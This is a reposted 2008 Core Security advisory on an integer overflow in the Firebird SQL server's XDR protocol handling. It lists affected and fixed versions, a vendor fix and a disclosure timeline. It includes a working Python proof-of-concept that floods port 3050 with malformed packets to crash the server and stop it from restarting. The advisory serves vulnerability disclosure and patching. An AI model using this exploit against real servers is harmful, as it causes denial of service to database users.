|
|
|
|
| |
Firebird is "a relational database that runs on Linux, Windows, and a variety of Unix platforms. The Firebird Project is a commercially independent project of C and C++ programmers, technical advisors and supporters developing and enhancing a multi-platform relational database management system based on the source code released by Inprise Corp (now known as Borland Software Corp) on 25 July, 2000".
The Firebird database manager contains an Integer Overflow in the processing of certain tags on the XDR protocol used for communication with the server. This led the server to corrupt the process memory and crash. Repeated attempts are followed by a crash of the process in charge of restarting the database server. This may also grant attackers remote execution of arbitrary code on servers running Firebird. |
| |
Credit:
The information has been provided by Core Security Technologies Advisories.
The original article can be found at: http://www.coresecurity.com/?action=item&id=2095
|
| |
Vulnerable Systems:
* Firebird SQL version 1.0.3 and prior
* Firebird SQL version Firebird SQL 1.5.5 and prior
* Firebird SQL version Firebird SQL 2.0.3 and prior
* Firebird SQL version Firebird SQL 2.1.0 Beta 2 and prior
Immune Systems:
* Firebird SQL version 1.5.6 (to be released)
* Firebird SQL version 2.0.4 (to be released)
* Firebird SQL version 2.1.0 RC1
Technical Description / Proof of Concept Code
The memory corruption happens when the parser (src/remote/protocol.cpp) receives any of the following operations with invalid data:
op_receive
op_start
op_start_and_receive
op_send
op_start_and_send
op_start_send_and_receive
The parser fails to properly sanitize certain variables before use. We can see that in the file src/remote/protocol.cpp there are the following assignments directly from the packet buffer to the data structure, without any validation (The MAP macro doesn't have any range checking):
src/remote/protocol.cpp:417
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
/* Changes to this op's protocol must mirror in xdr_protocol_overhead */
return xdr_request(xdrs, data->p_data_request,
data->p_data_message_number,
data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
And in the function xdr_request(), the variable data->p_data_request (as request_id) is used to index an array:
...
rrq* request = (rrq*) port->port_objects[request_id];
...
Corrupting memory structures and causing a DoS of the server, with possible execution of code. The same happens with the variable data->p_data_message_number.
The following python PoC causes a remote Denial of service and demonstrates the bug:
##Firebird DoS
##Damian Frizza - Core Security Exploit Writers Team
##tested against Firebird-2.0.3.12981-1-Win32.exe and
##Firebird-2.1.0.16780_0_Win32.exe
##fbserver.exe 2.0.3
##005637D0 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
##005637D4 0FB700 MOVZX EAX,WORD PTR DS:[EAX]
##005637D7 83EC 50 SUB ESP,50
##005637DA 56 PUSH ESI
##005637DB 8BF1 MOV ESI,ECX
##005637DD 8B8E AC000000 MOV ECX,DWORD PTR DS:[ESI+AC]
##005637E3 3B41 08 CMP EAX,DWORD PTR DS:[ECX+8] <----
##CRASH HERE
import socket
import time
def getTargetIP():
return '192.168.xxx.xxx'
port= 3050
op = '\x4a'
packet = '\x00\x00\x00' + op + 'A' * 2000
##Making the connection and sending the data 5 times, fbguard.exe fails
##to restart the service.
for i in range(0, 5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((getTargetIP(), port))
s.send(str(packet))
s.close()
time.sleep(1)
Vendor Information, Solutions and Workarounds
Firebird v2.1.0 RC1 fixes this vulnerability and is available for download at http://firebirdsql.org/index.php?op=files&id=fb210_RC1
The fix will also be included in versions v1.5.6 and v2.0.4. Version 2.0.4 will be released in February. The version 1.5.6 release is expected later this year.
The issue is registered in Firebird Tracker as CORE-1681.
Disclosure timeline:
2008-01-04: Initial notification sent by CoreLabs to Firebird SQL development team.
2008-01-08: Notification acknowledged by Firebird SQL development team.
2008-01-08: Technical details sent by Core to Firebird SQL dev. team.
2008-01-10: Firebird SQL dev. team notifies Core that a fix has been produced, and will be released in Firebird versions v1.5.6, v2.0.4 and v2.1.0 RC1.
2008-01-10: CoreLabs acknowledges information about fixes and requests date of the v2.1.0 RC1 release to the Firebird dev. team.
2008-01-15: Firebird dev. team confirms vendor information and dates of fixed versions.
|
|
|
|
|
|
|
|
|
|
